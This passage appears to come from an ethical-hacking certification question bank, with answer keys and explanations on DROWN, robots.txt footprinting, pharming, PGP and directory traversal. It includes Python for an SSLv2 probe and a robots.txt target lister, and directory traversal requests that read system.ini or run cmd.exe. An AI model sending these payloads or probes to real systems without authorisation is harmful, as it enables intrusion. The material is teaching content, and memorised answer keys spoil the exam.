4. Exploitation: In this step, the malware starts the action. The program code of the malware is triggered to
exploit the target's vulnerability/vulnerabilities.
5. Installation: In this step, the malware installs an access point for the intruder/attacker. This access point is
also known as the backdoor.
6. Command and Control: The malware gives the intruder/attacker access to the network/system.
7. Actions on Objective: Once the attacker/intruder gains persistent access, they finally take action to fulfill their
purposes, such as encryption for ransom, data exfiltration, or even data destruction.

QUESTION 18
Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server
permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2
connections.
This vulnerability makes the web server vulnerable to attacks, as the SSLv2 server can leak key information.
Which of the following attacks can be performed by exploiting the above vulnerability?

A. DROWN attack
B. Padding oracle attack
C. Side-channel attack
D. DUHK attack

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
DROWN is a serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the
essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse
the web, use email, shop online, and send instant messages without third parties being able to read the
communication.
DROWN allows attackers to break the encryption and read or steal sensitive communications, including
passwords, credit card numbers, trade secrets, or financial data. At the time of public disclosure in March
2016, the researchers' measurements indicated that 33% of all HTTPS servers were vulnerable to the attack.
Fortunately, the vulnerability is much less prevalent now. As of 2019, SSL Labs estimates that 1.2% of HTTPS
servers are vulnerable.
What can the attackers gain?
Any communication between users and the server. This typically includes, but is not limited to, usernames and
passwords, credit card numbers, emails, instant messages, and sensitive documents. Under some common
scenarios, an attacker can also impersonate a secure website and intercept or change the content the user sees.
Who is vulnerable?
Websites, mail servers, and other TLS-dependent services are at risk for the DROWN attack. At the time of
public disclosure, many popular sites were affected. The researchers used Internet-wide scanning to measure
how many sites were vulnerable.
Operators of vulnerable servers need to take action. There is nothing practical that browsers or end users can
do on their own to protect against this attack.
Is my site vulnerable?
Modern servers and clients use the TLS encryption protocol. However, due to misconfigurations, many servers
also still support SSLv2, a 1990s-era precursor to TLS. This support did not matter in practice, since no
up-to-date clients actually use SSLv2. Therefore, even though SSLv2 is known to be badly insecure, until now,
simply supporting SSLv2 was not considered a security problem, because clients never used it. DROWN shows
that merely supporting SSLv2 is a threat to modern servers and clients. It allows an attacker to decrypt modern
TLS connections between up-to-date clients and servers by sending probes to a server that supports SSLv2 and
uses the same private key.
A server is vulnerable to DROWN if:
It allows SSLv2 connections. This is surprisingly common, due to misconfiguration and inappropriate default
settings.
Its private key is used on any other server that allows SSLv2 connections, even for another protocol. Many
companies reuse the same certificate and key on their web and email servers, for instance. In this case, if the
email server supports SSLv2 and the web server does not, an attacker can take advantage of the email server
to break TLS connections to the web server.
How do I protect my server?
To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with
server software that allows SSLv2 connections. This includes web servers, SMTP servers, IMAP and POP
servers, and any other software that supports SSL/TLS. Disabling SSLv2 is complicated and depends on the
particular server software. Instructions for many common products:
OpenSSL: OpenSSL is a cryptographic library used in many server products. For users of OpenSSL, the easiest
and recommended solution is to upgrade to a recent OpenSSL version. OpenSSL 1.0.2 users should upgrade to
1.0.2g. OpenSSL 1.0.1 users should upgrade to 1.0.1s. Users of older OpenSSL versions should upgrade to
either one of these versions. (Updated March 13th, 16:00 UTC)
Microsoft IIS (Windows Server): Support for SSLv2 on the server side is enabled by default only on the OS
versions that correspond to IIS 7.0 and IIS 7.5, namely Windows Vista, Windows Server 2008, Windows 7 and
Windows Server 2008 R2. This support is disabled in the appropriate SSLv2 subkey for 'Server', as outlined in
KB245030. Even if users have not taken the steps to disable SSLv2, the export-grade and 56-bit ciphers that
make DROWN feasible are not supported by default.
Network Security Services (NSS): NSS is a common cryptographic library built into many server products. NSS
versions 3.13 (released back in 2012) and above should have SSLv2 disabled by default. (A small number of
users may have enabled SSLv2 manually and will need to take steps to disable it.) Users of older versions
should upgrade to a more recent version. It is still worth checking whether your private key is exposed
elsewhere.
Other affected software and operating systems: Instructions and information for: Apache, Postfix, Nginx,
Debian, Red Hat
Browsers and other clients: There is nothing practical that web browsers or other client software can do to
prevent DROWN. Only server operators are able to take action to protect against the attack.
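The practical check for the scenario above is whether any host sharing the key (web, SMTP, IMAP, POP) still answers an SSLv2 CLIENT-HELLO. Current OpenSSL builds no longer ship `s_client -ssl2`, so the probe below speaks raw SSLv2 instead. It is an added example, not code from the DROWN researchers or from any product: the record layout and the 3-byte CIPHER-KIND values come from the SSLv2 specification, while `build_client_hello`, `parse_server_hello`, `probe` and the constructed `SAMPLE_SERVER_HELLO` bytes are this example's own. A server that returns a SERVER-HELLO at all is exposed; one that also offers the 40-bit export ciphers is exactly what the original DROWN oracle needs.

```python
import socket
import struct

# SSLv2 CIPHER-KIND values (3 bytes each) from the SSLv2 specification.
SSLV2_CIPHERS = {
    b"\x01\x00\x80": "SSL_CK_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL_CK_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL_CK_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL_CK_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL_CK_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL_CK_DES_192_EDE3_CBC_WITH_MD5",
}
# The 40-bit export ciphers are what the general DROWN attack relies on.
EXPORT_CIPHERS = {b"\x02\x00\x80", b"\x04\x00\x80"}


def build_client_hello(challenge=b"\x11" * 16):
    """Build an SSLv2 CLIENT-HELLO record offering every SSLv2 cipher."""
    cipher_specs = b"".join(SSLV2_CIPHERS)
    body = (b"\x01"                                   # MSG-CLIENT-HELLO
            + b"\x00\x02"                             # CLIENT-VERSION 0x0002 = SSLv2
            + struct.pack(">HHH", len(cipher_specs), 0, len(challenge))
            + cipher_specs + challenge)               # no session id
    # 2-byte record header: high bit set = no padding, low 15 bits = body length.
    return struct.pack(">H", 0x8000 | len(body)) + body


def parse_server_hello(data):
    """Return cipher details if `data` is an SSLv2 SERVER-HELLO, else None."""
    if len(data) < 2 or not data[0] & 0x80:
        return None  # a TLS alert/record or garbage, not an SSLv2 record
    length = ((data[0] & 0x7F) << 8) | data[1]
    body = data[2:2 + length]
    if len(body) < 11 or body[0] != 0x04:  # MSG-SERVER-HELLO
        return None
    version, cert_len, cipher_len, conn_id_len = struct.unpack(">HHHH", body[3:11])
    if version != 0x0002:
        return None
    cipher_bytes = body[11 + cert_len:11 + cert_len + cipher_len]
    ciphers = [cipher_bytes[i:i + 3] for i in range(0, len(cipher_bytes), 3)]
    return {
        "sslv2": True,
        "certificate_len": cert_len,
        "ciphers": [SSLV2_CIPHERS.get(c, c.hex()) for c in ciphers],
        "export_ciphers": [SSLV2_CIPHERS[c] for c in ciphers if c in EXPORT_CIPHERS],
    }


def probe(host, port=443, timeout=5.0):
    """Live check (needs network): does host:port answer an SSLv2 CLIENT-HELLO?"""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello())
        data = b""
        try:
            while len(data) < 4096:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass  # SSLv2 servers wait for CLIENT-MASTER-KEY; we already have the hello
    return parse_server_hello(data)


# Constructed SERVER-HELLO (not a real capture): 3 placeholder certificate bytes,
# two cipher kinds (RC4-128 and the RC4-40 export cipher), 16-byte connection id.
SAMPLE_SERVER_HELLO = bytes.fromhex(
    "8024"                 # record header, body length 36
    "04" "00" "01"         # SERVER-HELLO, session-id-hit=0, cert-type=X.509
    "0002"                 # SERVER-VERSION SSLv2
    "0003" "0006" "0010"   # certificate len, cipher-specs len, connection-id len
    "300302"               # placeholder certificate bytes
    "010080" "020080"      # SSL_CK_RC4_128_WITH_MD5, SSL_CK_RC4_128_EXPORT40_WITH_MD5
) + b"\xaa" * 16

if __name__ == "__main__":
    print(parse_server_hello(SAMPLE_SERVER_HELLO))
    # probe("mail.example.com", 465)  # run against every host that shares the key
```

Run `probe()` against every service that uses the same key, not just port 443; a web server with SSLv2 disabled is still DROWN-exposed if the mail server on 465 or 993 answers. A `None` result from a TLS-only server means the server replied with a TLS alert or closed the connection rather than sending an SSLv2 SERVER-HELLO.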

QUESTION 19
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization.
In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims
and scanned several machines on the same network to identify vulnerabilities to perform further exploitation.
What is the type of vulnerability assessment tool employed by John in the above scenario?

A. Proxy scanner
B. Agent-based scanner
C. Network-based scanner
D. Cluster scanner

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Network-based scanner
A network-based vulnerability scanner, in simple terms, is the process of identifying loopholes in a computer's
network or IT assets which hackers and threat actors can exploit. By implementing this process, one can
successfully identify the organization's current risk(s). This is not where the buck stops; one can also verify
the effectiveness of the system's security measures while improving internal and external defenses. Through
this review, an organization is well equipped to take an extensive inventory of all systems, including operating
systems, installed software, security patches, hardware, firewalls, anti-virus software, and much more.
Agent-based scanner
Agent-based scanners make use of software scanners on each and every device; the results of the scans are
reported back to the central server. Such scanners are well equipped to find and report on a range of
vulnerabilities. NOTE: This option does not fit the scenario, since for it to work, you need to install a special
agent on each computer before you start collecting data from them.

QUESTION 20
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch
quickly between the domains and avoid detection. Identify the behavior of the adversary in the above scenario.

A. Use of command-line interface
B. Data staging
C. Unspecified proxy activities
D. Use of DNS tunneling

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A proxy server acts as a gateway between you and the internet. It's an intermediary server separating end
users from the websites they browse. Proxy servers provide varying levels of functionality, security, and
privacy depending on your use case, needs, or company policy. If you're using a proxy server, internet traffic
flows through the proxy server on its way to the address you requested. A proxy server is essentially a
computer on the internet with its own IP address that your computer knows. When you send a web request,
your request goes to the proxy server first. The proxy server then makes your web request on your behalf,
collects the response from the web server, and forwards you the web page data so you'll see the page in your
browser.

QUESTION 21
There are multiple cloud deployment options depending on how isolated a customer's resources are from those
of other customers. Shared environments share the costs and allow each customer to enjoy lower operations
expenses. One solution is for a customer to join with a group of users or organizations to share a cloud
environment. What is this cloud deployment option called?
A. Hybrid
B. Community
C. Public
D. Private

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The purpose of this idea is to permit multiple customers to work on joint projects and applications that belong
to the community, where it's necessary to possess a centralized cloud infrastructure. In other words, Community
Cloud is a distributed infrastructure that solves the specific problems of business sectors by integrating the
services provided by different types of cloud solutions.
The communities involved in these projects, like tenders, business organizations, and research companies,
focus on similar issues in their cloud interactions. Their shared interests may include concepts and policies
associated with security and compliance considerations, and the goals of the project as well.
Community Cloud computing facilitates its users to identify and analyze their business demands better.
Community Clouds may be hosted in a data center, owned by one of the tenants, or by a third-party cloud
services provider and may be either on-site or off-site.
Community Cloud Examples and Use Cases
Cloud providers have developed Community Cloud offerings, and some organizations are already seeing the
advantages. The following list shows a number of the main scenarios of the Community Cloud model that are
beneficial to the participating organizations.
Multiple governmental departments that perform transactions with each other can have their processing
systems on shared infrastructure. This setup makes it cost-effective to the tenants, and may also reduce their
data traffic.
Benefits of Community Clouds
Community Cloud provides benefits to organizations within the community, individually as well as collectively.
Organizations don't need to worry about the safety concerns linked with Public Cloud due to the closed user
group. This recent cloud computing model has great potential for businesses seeking cost-effective cloud
services to collaborate on joint projects, because it comes with multiple advantages.
Openness and Impartiality
Community Clouds are open systems, and they remove the dependency organizations have on cloud service
providers. Organizations can achieve many benefits while avoiding the disadvantages of both public and
private clouds.
Flexibility and Scalability
Ensures compatibility among each of its users, allowing them to modify properties according to their individual
use cases. They also enable companies to interact with their remote employees and support the use of various
devices, be it a smartphone or a tablet. This makes this sort of cloud solution more flexible to users' demands.
Consists of a community of users and, as such, is scalable in several aspects like hardware resources,
services, and manpower. It takes into consideration demand growth, and you simply need to increase the
user-base.
High Availability and Reliability
Your cloud service must be able to ensure the availability of data and applications at all times. Community
Clouds secure your data in the same way as any other cloud service, by replicating data and applications in
multiple secure locations to protect them from unforeseen circumstances. The cloud possesses redundant
infrastructure to make sure data is available whenever and wherever you need it. High availability and
reliability are critical concerns for any sort of cloud solution.
Security and Compliance
Two significant concerns discussed when organizations consider cloud computing are data security and
compliance with relevant regulatory authorities. Compromising each other's data security isn't profitable to
anyone in a Community Cloud. Users can configure various levels of security for their data. Common use cases:
The ability to block users from editing and downloading specific datasets.
Making sensitive data subject to strict regulations on who has access to it. Sharing sensitive data unique to a
specific organization would bring harm to all the members involved.
What devices can store sensitive data.
Convenience and Control
Conflicts associated with convenience and control don't arise in a Community Cloud. Democracy is a crucial
factor the Community Cloud offers, as all tenants share and own the infrastructure and make decisions
collaboratively. This setup allows organizations to have their data closer to them while avoiding the
complexities of a Private Cloud.
Less Work for the IT Department
Having data, applications, and systems in the cloud means you do not need to manage them entirely. This
convenience eliminates the need for tenants to employ extra human resources to manage the system. Even in
a self-managed solution, the work is split among the participating organizations.
Environment Sustainability
In the Community Cloud, organizations use one platform for all their needs, which dissuades them from
investing in separate cloud facilities. This shift introduces a symbiotic relationship between broadening and
shrinking the use of cloud among clients. With the reduction of organizations using different clouds, resources
are used more efficiently, thus resulting in a smaller carbon footprint.

QUESTION 22
Bob was recently hired by a medical company after it experienced a major cyber security breach.
Many patients are complaining that their personal medical records are fully exposed on the Internet and
someone can find them with a simple Google search. Bob's boss is very worried because of regulations that
protect those data. Which of the following regulations is mostly violated?

A. HIPAA/PHI
B. PII
C. PCI DSS
D. ISO 2002

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
PHI stands for Protected Health Information. The HIPAA Privacy Rule provides federal protections for personal
health information held by covered entities and gives patients an array of rights with regard to that
information. Under HIPAA, PHI is considered to be any identifiable health information that is used, maintained,
stored, or transmitted by a HIPAA-covered entity (a healthcare provider, health plan or health insurer, or a
healthcare clearinghouse) or a business associate of a HIPAA-covered entity, in relation to the provision of
healthcare or payment for healthcare services.
It is not only past and current health information that is considered PHI under HIPAA Rules, but also future
information about medical conditions or physical and mental health related to the provision of care or payment
for care. PHI is health information in any form, including physical records, electronic records, or spoken
information.
Therefore, PHI includes health records, medical histories, lab test results, and medical bills. Essentially, all
health information is considered PHI when it includes individual identifiers. Demographic information is also
considered PHI under HIPAA Rules, as are many common identifiers such as patient names, Social Security
numbers, driver's license numbers, insurance details, and birth dates, when they are linked with health
information.
The eighteen identifiers that make health information PHI are:
Names
Dates, except year
Telephone numbers
Geographic information
FAX numbers
Social Security numbers
Email addresses
Medical record numbers
Account numbers
Health plan beneficiary numbers
Certificate/license numbers
Vehicle identifiers and serial numbers including license plates
Web URLs
Device identifiers and serial numbers
Internet protocol addresses
Full face photos and comparable images
Biometric identifiers (i.e. retinal scan, fingerprints)
Any unique identifying number or code
One or more of these identifiers turns health information into PHI, and the HIPAA Privacy Rule restrictions
will then apply that limit uses and disclosures of the information. HIPAA covered entities and their business
associates will need to ensure appropriate technical, physical, and administrative safeguards are implemented
to ensure the confidentiality, integrity, and availability of PHI as stipulated in the HIPAA Security Rule.

QUESTION 23
What is the common name for a vulnerability disclosure program opened by companies in platforms such as
HackerOne?

A. Vulnerability hunting program
B. Bug bounty program
C. White-hat hacking program
D. Ethical hacking program

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Bug bounty programs allow independent security researchers to report bugs to an organization and receive
rewards or compensation. These bugs are usually security exploits and vulnerabilities, though they can also
include process issues, hardware flaws, and so on. The reports are typically made through a program run by an
independent third party (like Bugcrowd or HackerOne). The organization will set up (and run) a program curated
to the organization's needs.
Programs may be private (invite-only) where reports are kept confidential to the organization or public (where
anyone can sign up and join). They can take place over a set timeframe or with no end date (though the
second option is more common).
Who uses bug bounty programs?
Many major organizations use bug bounties as a part of their security program, including AOL, Android, Apple,
Digital Ocean, and Goldman Sachs. You can view a list of all the programs offered by major bug bounty
providers, Bugcrowd and HackerOne, at these links.
Why do companies use bug bounty programs?
Bug bounty programs give companies the ability to harness a large group of hackers in order to find bugs in
their code. This gives them access to a larger number of hackers or testers than they would be able to access
on a one-on-one basis. It can also increase the chances that bugs are found and reported to them before
malicious hackers can exploit them. It can also be a good public relations choice for a firm. As bug bounties
have become more common, having a bug bounty program can signal to the public and even regulators that an
organization has a mature security program. This trend is likely to continue, as some have started to see bug
bounty programs as an industry standard that all organizations should invest in.
Why do researchers and hackers participate in bug bounty programs?
Finding and reporting bugs via a bug bounty program can result in both cash bonuses and recognition. In
some cases, it can be a great way to show real-world experience when you're looking for a job, or can even
help introduce you to folks on the security team within an organization. This can be full time income for some
people, income to supplement a job, or a way to show off your skills and get a full time job. It can also be fun!
It's a great (legal) chance to test out your skills against big companies and government agencies.
What are the disadvantages of a bug bounty program for independent researchers and hackers?
A lot of hackers participate in these types of programs, and it can be difficult to make a significant amount
of money on the platform. In order to claim the reward, the hacker needs to be the first person to submit the
bug to the program. That means that in practice, you may spend weeks looking for a bug to exploit, only to be
the second person to report it and make no money. Roughly 97% of participants on major bug bounty platforms
have never sold a bug.
In fact, a 2019 report from HackerOne confirmed that out of more than 300,000 registered users, only around
2.5% received a bounty in their time on the platform.
Essentially, most hackers aren't making much money on these platforms, and very few are making enough to
replace a full time salary (plus they don't have benefits like vacation days, insurance, and retirement
planning).
What are the disadvantages of bug bounty programs for organizations?
These programs are only beneficial if the program results in the organization finding problems that they
weren't able to find themselves (and if they can fix those problems)! If the organization isn't mature enough
to be able to quickly rectify identified issues, a bug bounty program isn't the right choice for their
organization.
Also, any bug bounty program is likely to attract a large number of submissions, many of which may not be
high-quality submissions. A company must be prepared to deal with the increased volume of alerts, and the
possibility of a low signal to noise ratio (essentially that it's probable that they will receive quite a few
unhelpful reports for every helpful report).
Additionally, if the program doesn't attract enough participants (or participants with the wrong skill set, and
so participants aren't able to identify any bugs), the program isn't helpful for the organization. The vast
majority of bug bounty participants concentrate on website vulnerabilities (72%, according to HackerOne),
while only a few (3.5%) choose to look for operating system vulnerabilities.
This is likely due to the fact that hacking operating systems (like network hardware and memory) requires a
significant amount of highly specialized expertise. This means that companies may see significant return on
investment for bug bounties on websites, and not for other applications, particularly those that require
specialized expertise.
This also means that organizations which need to examine an application or website within a specific
time-frame may not want to rely on a bug bounty as there's no guarantee of when or if they receive reports.
Finally, it can be potentially risky to allow independent researchers to attempt to penetrate your network.
This could result in public disclosure of bugs, causing reputation damage in the limelight (which could result
in people not wanting to purchase the organization's product or service), or disclosure of bugs to more
malicious third parties, who could use this information to target the organization.

QUESTION 24
Which file is a rich target to discover the structure of a website during web-server footprinting?

A. Document root
B. Robots.txt
C. domain.txt
D. index.html

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
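robots.txt is a rich footprinting target because the paths a site asks crawlers to stay out of (admin panels, backups, staging trees) are exactly the ones worth a manual look. The following added example (not part of the original question bank) parses a robots.txt into its User-agent groups and turns every Disallow entry into a candidate URL; the `SAMPLE_ROBOTS` text and the `example.com` base URL are constructed for the demonstration, and `fetch_robots` is a small convenience wrapper around `urllib` for live use.

```python
from urllib.parse import urljoin
from urllib.request import urlopen

# Constructed sample robots.txt, not from a real site.
SAMPLE_ROBOTS = """# internal: do not index
User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql
Allow: /public/
Sitemap: https://example.com/sitemap.xml

User-agent: Googlebot
Disallow: /staging/
Disallow:
"""


def parse_robots(text):
    """Return ([group, ...], [sitemap_url, ...]).

    A group is {"agents": [...], "disallow": [...], "allow": [...]}; consecutive
    User-agent lines share one group, as in the robots.txt convention.
    """
    groups, sitemaps, current = [], [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "sitemap":
            sitemaps.append(value)
        elif field == "user-agent":
            # Start a new group unless the previous one has no rules yet.
            if current is None or current["disallow"] or current["allow"]:
                current = {"agents": [], "disallow": [], "allow": []}
                groups.append(current)
            current["agents"].append(value)
        elif field in ("disallow", "allow") and current is not None and value:
            current[field].append(value)                # "Disallow:" (empty) = allow all, skip
    return groups, sitemaps


def footprint_targets(text):
    """Every distinct Disallow path across all groups, plus sitemap URLs."""
    groups, sitemaps = parse_robots(text)
    paths = []
    for group in groups:
        for path in group["disallow"]:
            if path not in paths:
                paths.append(path)
    return paths, sitemaps


def candidate_urls(base_url, paths):
    """Join disallowed paths onto the site root so they can be requested directly."""
    return [urljoin(base_url, p) for p in paths]


def fetch_robots(base_url, timeout=10):
    """Live fetch (needs network) of <base_url>/robots.txt as text."""
    with urlopen(urljoin(base_url, "/robots.txt"), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    paths, sitemaps = footprint_targets(SAMPLE_ROBOTS)
    for url in candidate_urls("https://example.com", paths):
        print(url)
    print("sitemaps:", sitemaps)
```

Treat the output as a worklist, not a finding: a Disallow entry proves only that the operator did not want the path crawled, so each candidate still has to be requested and its response classified (403 versus 200 versus redirect to login) before it means anything.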

QUESTION 25
John wants to send Marie an email that includes sensitive information, and he does not trust the network that
he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly
using this type of encryption?

A. Use his own public key to encrypt the message.
B. Use Marie's public key to encrypt the message.
C. Use his own private key to encrypt the message.
D. Use Marie's private key to encrypt the message.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
When a user encrypts plaintext with PGP, PGP first compresses the plaintext. PGP then creates a one-time
session key; the session key works with a very secure, fast conventional encryption algorithm to encrypt the
plaintext; the result is ciphertext. Once the data is encrypted, the session key is then encrypted to the
recipient's public key. This is why John must encrypt to Marie's public key: only Marie's private key can then
recover the session key and decrypt the message.
https://en.wikipedia.org/wiki/Pretty_Good_Privacy
Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication
for data communication. PGP is used for signing, encrypting, and decrypting texts, emails, files, directories,
and whole disk partitions and to increase the security of e-mail communications.
PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and
finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound
to a username or an e-mail address.
https://en.wikipedia.org/wiki/Public-key_cryptography
Public key encryption uses two different keys. One key is used to encrypt the information and the other is used
to decrypt the information. Sometimes this is referred to as asymmetric encryption because two keys are
required to make the system and/or process work securely. One key is known as the public key and should be
shared by the owner with anyone who will be securely communicating with the key owner. However, the owner's
secret key is not to be shared and considered a private key. If the private key is shared with unauthorized
recipients, the encryption mechanisms protecting the information must be considered compromised.

QUESTION 26
Attacker Steve targeted an organization's network with the aim of redirecting the company's web traffic to
another malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the
vulnerabilities in the DNS server software and modified the original IP address of the target website to that of a
fake website. What is the technique employed by Steve to gather information for identity theft?

A. Pretexting
B. Pharming
C. Wardriving
D. Skimming

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A pharming attacker tries to send a website's traffic to a fake website controlled by the attacker, typically for
the purpose of collecting sensitive data from victims or installing malware on their machines. Attackers tend to
focus on creating look-alike ecommerce and digital banking websites to harvest credentials and payment card
data.
Though they share similar goals, pharming uses a different technique from phishing. "Pharming attacks are
focused on manipulating a system, rather than tricking people into going to a dangerous website," explains
David Emm, principal security researcher at Kaspersky. "When either a phishing or pharming attack is completed
by a criminal, they have the same driving factor to get victims onto a corrupt location, but the mechanisms in
which this is undertaken are different."

QUESTION 27
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems
by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts
information such as sender identities, mail servers, sender IP addresses, and sender locations from different
public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of
the following tools is used by Wilson in the above scenario?

A. Factiva
B. Netcraft
C. infoga
D. Zoominfo
Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Infoga is a tool for gathering email account information (ip, hostname, country, ...) from different public
sources (search engines, PGP key servers and Shodan) and checking whether an email was leaked using the
haveibeenpwned.com API. It is a really simple tool, but very effective for the early stages of a penetration test
or just to know the visibility of your company on the Internet.

QUESTION 28
While testing a web application in development, you notice that the web server does not properly ignore the
"dot dot slash" (../) character string and instead returns the file listing of a folder structure of the server.
What kind of attack is possible in this scenario?

A. Cross-site scripting
B. Denial of service
C. SQL injection
D. Directory traversal

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Properly controlling access to web content is crucial for running a secure web server. Directory traversal or
Path Traversal is an HTTP attack which allows attackers to access restricted directories and execute
commands outside of the web server's root directory. Web servers provide two main levels of security
mechanisms:
Access Control Lists (ACLs)
Root directory
An Access Control List is used in the authorization process. It is a list which the web server's administrator
uses to indicate which users or groups are able to access, modify or execute particular files on the server, as
well as other access rights. The root directory is a specific directory on the server file system in which the
users are confined. Users are not able to access anything above this root.
For example: the default root directory of IIS on Windows is C:\Inetpub\wwwroot and with this setup, a user
does not have access to C:\Windows but has access to C:\Inetpub\wwwroot\news and any other directories and
files under the root directory (provided that the user is authenticated via the ACLs).
The root directory prevents users from accessing any files on the server such as C:\WINDOWS/
system32/win.ini on Windows platforms and the /etc/passwd file on Linux/UNIX platforms. This vulnerability
can exist either in the web server software itself or in the web application code. To perform a directory
traversal attack, all an attacker needs is a web browser and some knowledge of where to blindly find any
default files and directories on the system.
What an attacker can do if your website is vulnerable
With a system vulnerable to directory traversal, an attacker can make use of this vulnerability to step out of
the root directory and access other parts of the file system. This might give the attacker the ability to view
restricted files, which could provide the attacker with more information required to further compromise the
system. Depending on how the website access is set up, the attacker will execute commands by impersonating
the user which is associated with "the website". Therefore it all depends on what the website user has been
given access to in the system.
Example of a Directory Traversal attack via web application code
In web applications with dynamic pages, input is usually received from browsers through GET or POST request
methods. Here is an example of an HTTP GET request URL:
GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the
parameter view with the value of oldarchive.html. When this request is executed on the web server, show.asp
retrieves the file oldarchive.html from the server's file system, renders it and then sends it back to the
browser which displays it to the user. The attacker would assume that show.asp can retrieve files from the file
system and sends the following custom URL.
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user.
The expression ../ instructs the system to go one directory up, which is commonly used as an operating system
directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the
system, but this is easily done by trial and error.
Example of a Directory Traversal attack via web server
Apart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The
problem can either be incorporated into the web server software or inside some sample script files left available
on the server. The vulnerability has been fixed in the latest versions of web server software, but there are web
servers online which are still using older versions of IIS and Apache which might be open to directory traversal
attacks. Even though you might be using a web server software version that has fixed this vulnerability, you
might still have some sensitive default script directories exposed which are well known to hackers.
For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute
a command can be:
GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1
Host: server.com
The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command
shell file and running the command dir c:\ in the shell. The %5c expression that is in the URL request is a web
server escape code which is used to represent normal characters. In this case %5c represents the character \.
Newer versions of modern web server software check for these escape codes and do not let them through.
Some older versions however, do not filter out these codes in the root directory enforcer and will let the
attackers execute such commands.
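
The two requests above show the flaw from the requesting side. As an added example (not part of the original dump), the following Python mirrors the flawed lookup beside a hardened version: it decodes the parameter, treats %5c and a literal backslash as path separators, normalises the result and rejects anything that no longer sits under the web root. The web root path and the function names are assumptions made for the demonstration.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed web root for the demonstration (assumption): the directory that
# the "view" parameter of a page like show.asp is meant to read from.
WEB_ROOT = "/var/www/webarticles"


def vulnerable_resolve(view: str) -> str:
    """Mirror of the flawed show.asp logic described above: the parameter is
    glued onto the web root with no normalisation, so '../' walks out of it."""
    return WEB_ROOT + "/" + view


def safe_resolve(view: str) -> Optional[str]:
    """Hardened lookup: return the absolute path to serve, or None when the
    request would leave WEB_ROOT (a traversal attempt)."""
    # 1. Decode percent-encoding (%5c -> '\', %2e -> '.').  Repeat until the
    #    value is stable so a double-encoded %255c cannot slip past the check.
    decoded = view
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # 2. Treat backslash as a separator as well: IIS accepts '..\' for '../'.
    decoded = decoded.replace("\\", "/")
    # 3. Normalise lexically ('a/../b' -> 'b'), then require that the result is
    #    still the root itself or something underneath it.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    # On a real server also resolve symlinks (os.path.realpath) before serving.
    return candidate


if __name__ == "__main__":
    for view in ("oldarchive.html",
                 "../../../../../Windows/system.ini",
                 "..%5c../Windows/System32/cmd.exe"):
        print(f"{view!r:45} vulnerable -> {vulnerable_resolve(view)}")
        print(f"{'':45} safe       -> {safe_resolve(view)}")
```

The lexical check alone is not enough when the web root contains symlinks; resolve the candidate with os.path.realpath and repeat the prefix test on the result before opening the file.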

QUESTION 29
Henry is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

A. 64
B. 128
C. 255
D. 138

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Windows TTL 128, Linux TTL 64, OpenBSD 255 ... https://subinsb.com/default-device-ttl-values/
